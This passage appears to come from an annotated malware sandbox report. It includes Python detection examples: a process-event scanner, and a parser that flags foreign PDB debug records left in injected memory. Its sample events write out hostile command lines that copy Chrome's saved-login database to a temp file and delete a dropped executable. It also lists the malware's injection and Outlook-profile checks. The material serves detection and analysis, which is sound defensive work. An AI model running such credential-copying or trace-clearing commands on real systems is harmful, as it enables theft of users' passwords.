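SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent_image": r"C:\Windows\SysWOW64\NETSTAT.EXE",
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "command_line": r"/c del 'C:\Users\user\subfolder1\filename1.exe'"},
    {"parent_image": r"C:\Windows\SysWOW64\NETSTAT.EXE",
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "command_line": r"/c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V"},
    {"parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Users\user\subfolder1\filename1.exe",
     "command_line": r"C:\Users\user\subfolder1\filename1.exe"},
    # Benign control: an admin shell running netstat, the legitimate direction.
    {"parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\NETSTAT.EXE",
     "command_line": "netstat -ano"},
]

if __name__ == "__main__":
    for rule, cmdline in scan(SAMPLE_EVENTS):
        print(f"{rule:35} {cmdline}")
```

The benign control shows the direction that matters: a shell launching netstat is routine administration, netstat launching a shell is not. In a real pipeline the events come from Sysmon event ID 1 or the EDR's process-creation telemetry, and the patterns key on path shape rather than on the exact file names from this sample, which change per campaign.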
Uses an in-process (OLE) Automation server
Source: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Writes ini files
Source: C:\Windows\SysWOW64\NETSTAT.EXE  File written: C:\Users\user\AppData\Roaming\O7P4TUST\O7Plogri.ini
Found graphical window changes (likely an installer)
Source: Window Recorder  Window detected: More than 3 window changes detected
Checks if Microsoft Office is installed
Source: C:\Windows\SysWOW64\NETSTAT.EXE  Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Binary contains paths to debug symbols
Source: Binary string: netstat.pdbGCTL source: filename1.exe, 0000000A.00000002.890435191.00000000000D0000.00000040.00000001.sdmp
Source: Binary string: colorcpl.pdbGCTL source: filename1.exe, 0000000C.00000003.911661147.000000000090A000.00000004.00000001.sdmp
Source: Binary string: cmmon32.pdb source: filename1.exe, 00000005.00000003.930576378.00000000008EE000.00000004.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.890621224.0000000007010000.00000002.00000001.sdmp
Source: Binary string: colorcpl.pdb source: filename1.exe, 0000000C.00000003.911661147.000000000090A000.00000004.00000001.sdmp
Source: Binary string: systray.pdb source: filename1.exe, 0000001A.00000002.1279296368.00000000007FE000.00000004.00000001.sdmp
Source: Binary string: systray.pdbGCTL source: filename1.exe, 0000001A.00000002.1279296368.00000000007FE000.00000004.00000001.sdmp
Source: Binary string: netstat.pdb source: filename1.exe, 0000000A.00000002.890435191.00000000000D0000.00000040.00000001.sdmp
Source: Binary string: cmmon32.pdbGCTL source: filename1.exe, 00000005.00000003.930576378.00000000008EE000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: filename1.exe, 00000005.00000002.936564820.000000001F3B0000.00000040.00000001.sdmp, filename1.exe, 0000000A.00000002.901372392.000000001F4BF000.00000040.00000001.sdmp, filename1.exe, 0000000C.00000002.923689704.000000001F4E0000.00000040.00000001.sdmp, filename1.exe, 0000001A.00000002.1283486170.000000001F60F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: filename1.exe
Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.890621224.0000000007010000.00000002.00000001.sdmp
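The PDB names above are the useful part of this signature: netstat.pdb, colorcpl.pdb, cmmon32.pdb and systray.pdb are found in memory belonging to filename1.exe, which is what a mapped copy of another executable leaves behind and which matches the injected processes listed elsewhere in this report. Two caveats when reading such strings: the "GCTL" and "UGP" suffixes are the signature bytes of the POGO debug entry stored next to the CodeView record, not part of the path, and wntdll.pdb is the PDB of the 32-bit ntdll.dll present in every WOW64 process, so on its own it is not a signal. The following is an added example, not code from the report or from Joe Sandbox: a Python scanner that parses CodeView RSDS records out of a dumped memory region and reports PDB names that do not belong to the host image. The buffer it runs on is constructed for the demonstration.

```python
"""Pull CodeView (RSDS) debug records out of a memory buffer and flag PDB
names that belong to a different image than the process they were found in.
Added example, not part of the sandbox report; the buffer below is
constructed, a real input would be a dumped memory region."""
import re
import struct
import uuid
from typing import List, Tuple

# RSDS layout: b"RSDS", 16-byte GUID, 4-byte little-endian age, then the
# NUL-terminated PDB path (ASCII in practice).
RSDS_RE = re.compile(rb"RSDS(.{16})(.{4})([\x20-\x7e]{1,260})\x00", re.S)


def find_pdb_records(buf: bytes) -> List[Tuple[str, int, str]]:
    """(guid, age, pdb_path) for every RSDS record in buf, in offset order."""
    records = []
    for m in RSDS_RE.finditer(buf):
        guid = str(uuid.UUID(bytes_le=m.group(1)))
        age = struct.unpack("<I", m.group(2))[0]
        records.append((guid, age, m.group(3).decode("ascii")))
    return records


def stem(path: str) -> str:
    """Lower-cased file name without directory or extension."""
    name = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name.rsplit(".", 1)[0]


def foreign_pdbs(buf: bytes, host_image: str) -> List[str]:
    """PDB file names in buf whose stem is not the host image's stem."""
    host = stem(host_image)
    return [
        path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        for _, _, path in find_pdb_records(buf)
        if stem(path) != host
    ]


FIXED_GUID = uuid.UUID("01234567-89ab-cdef-0123-456789abcdef")  # constructed


def make_rsds(pdb_path: str, age: int = 1) -> bytes:
    """Build a synthetic RSDS record for test data."""
    return (b"RSDS" + FIXED_GUID.bytes_le + struct.pack("<I", age)
            + pdb_path.encode("ascii") + b"\x00")


# Constructed stand-in for a dump of filename1.exe: its own PDB record plus
# one for netstat.pdb, which is what a mapped copy of netstat.exe leaves
# behind. The "GCTL" bytes after the path stand for the POGO debug entry
# that follows the RSDS record in real binaries; they are not part of the path.
SAMPLE_DUMP = (
    b"\x00" * 32
    + make_rsds(r"C:\build\filename1.pdb")
    + b"\xcc" * 64
    + make_rsds("netstat.pdb", age=2)
    + b"GCTL" + b"\x00" * 12
)

if __name__ == "__main__":
    for guid, age, path in find_pdb_records(SAMPLE_DUMP):
        print(f"{guid} age={age} {path}")
    print("foreign:", foreign_pdbs(SAMPLE_DUMP, r"C:\Users\user\subfolder1\filename1.exe"))
```

Run against a real dump, the GUID and age pair each record to a specific build of the Windows binary, which lets you confirm that the copy in the injected process is byte-identical to the one on disk (same GUID/age) rather than a trojanised build. Matching on the file stem rather than the full path is deliberate: legitimate PDB paths carry build-server directories that vary by Windows release.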

Data Obfuscation:
